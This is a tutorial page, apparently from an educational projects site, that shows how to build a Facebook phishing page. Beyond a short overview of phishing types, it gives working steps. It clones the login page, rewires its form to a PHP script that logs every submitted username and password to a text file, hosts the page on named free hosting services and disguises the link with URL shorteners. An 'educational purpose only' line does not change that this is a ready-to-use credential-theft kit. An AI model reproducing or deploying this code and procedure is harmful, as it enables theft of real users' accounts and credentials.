Simple Phishing attack

Published on . Written by

Simple Phishing attack

If you are from a computer science background, you might have come across this phrase “phishing”. Phishing is an act of acquiring information such as bank card details, username, passwords, etc. from an individual illegally. In this ethical hacking project, we will create a phishing page of Facebook to acquire the username and login credentials of the victim. This project is for educational purpose only don’t misuse.


Skyfi Labs Projects
Following are the target areas where the phishing attack is performed - social networking sites, online payment sites, banking sites, online shopping sites, etc. This phishing technique is carried by sending a link to the victim via email or messaging applications.

Read more..

SLNOTE
Now imagine that you are the victim. You are getting a phishing scam link via mail the mail ID also looks genuine similar to the mails from banks or shopping sites. Mostly phishing links will redirect to a site which looks similar to the original site. As you try to log in to the site using your login credential the hacker get your details and will access your account illegally.

Following are the different types of phishing:

  • Man-In-The-Middle: In this method, the hacker stays between the victim and the website where the hacker acquires the sensitive information when the user tries to access the site.
  • Phishing using Keylogger: Here the phisher uses a keylogger software which records all the keystrokes made by the user in the computer and sends it to the hacker.
  • Content injection: It is a method where the phisher alters the content on the webpage (not by hacking the site) and redirects the victim outside of the page to acquire sensitive information.
  • Phone-based phishing: Here the phisher makes a call to the victim with the help of fake caller ID and collects the sensitive information from the user.
  • Instant messaging: It is a widely used phishing method where the user gets a phishing link which redirects him to a fake site that looks similar to the original site, where the hacker acquires the sensitive information.

SLLATEST
Project Implementation:

Following are the procedures to create a phishing web page of Facebook:

  • Download the HTML index of the Facebook login page
  • Create a PHP file to fetch the password
  • Modify the HTML file to insert the PHP code
  • Host the phishing page
The first step is to download the HTML code of Facebook login page. For that, go to facebook.com right-click > view source page. Copy-paste the entire code into notepad.

Now find and replace the following line inside the quotations “https://www.facebook.com/login.php?login_attempt=1” to “post.php”. Then save the file by naming it as index.html.

Next, we will create a PHP file to fetch the password for that create a new notepad file and paste the following code it and save it as post.php.

<?php

header (‘Location:http://www.facebook.com/’);

$handle = fopen(“usernames.txt”, “a”);

foreach($_POST as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “rn”);

}

fwrite($handle, “rn”);

fclose($handle);

exit;

?>

The above code takes the username and password then saves it in a separate .txt file.

The phishing webpage is now ready to upload. You can use free web hosting services like Freehosting.com, Hostinger.com, 000webhost.com, Freehostia.com, InfinityFree.net, etc.

Create an account from the above mentioned free Webhosting sites. Navigate to the file manager and delete the default files then upload the two files which you have created.

Now you can use the URL of that page to collect the sensitive information from the victims. Mostly phishers use URL shorteners to make the link look similar to the original links.


SLDYK
Kit required to develop Simple Phishing attack:
Technologies you will learn by working on Simple Phishing attack:


Any Questions?


Subscribe for more project ideas